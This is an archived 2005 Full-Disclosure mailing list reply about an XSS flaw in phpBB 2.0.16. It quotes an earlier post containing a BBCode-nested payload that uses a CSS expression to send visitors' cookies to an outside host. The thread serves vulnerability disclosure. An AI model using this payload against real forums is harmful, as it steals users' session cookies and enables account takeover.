Re: [Full-disclosure] XSS in nested tag in phpbb 2.0.16
From: Aaron Horst (anthrax101_at_gmail.com)
Date: 07/05/05
- Previous message: Aaron Horst: "[Full-disclosure] Unpatched phpBB XSS [in 2.0.16]"
- In reply to: alex: "[Full-disclosure] XSS in nested tag in phpbb 2.0.16"
- Next in thread: Paul Laudanski: "[Full-disclosure] Re: XSS in nested tag in phpbb 2.0.16"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 5 Jul 2005 16:48:50 -0400 To: full-disclosure@lists.grok.org.uk
Please forgive my redundant report, below. I forgot to flush my cached
copy of the FD list.
AnthraX101
On 7/5/05, alex <pigrelax@yandex.ru> wrote:
> Hi all!
>
> Example:
>
> [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'styl
> e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antic
> hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/u
> rl][/url]'[/color]
>
> More info:
> http://www.securitylab.ru/55612.html
>
> and
>
> http://antichat.ru/txt/phpbb/
>
> (In Russian)
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-- AnthraX101 -- PGP Key ID# 0x4CD6D0BD Fingerprint: 8161 D008 3DAB 86C1 2CA3 AEDE 0E21 DBDE 4CD6 D0BD _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
- Previous message: Aaron Horst: "[Full-disclosure] Unpatched phpBB XSS [in 2.0.16]"
- In reply to: alex: "[Full-disclosure] XSS in nested tag in phpbb 2.0.16"
- Next in thread: Paul Laudanski: "[Full-disclosure] Re: XSS in nested tag in phpbb 2.0.16"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
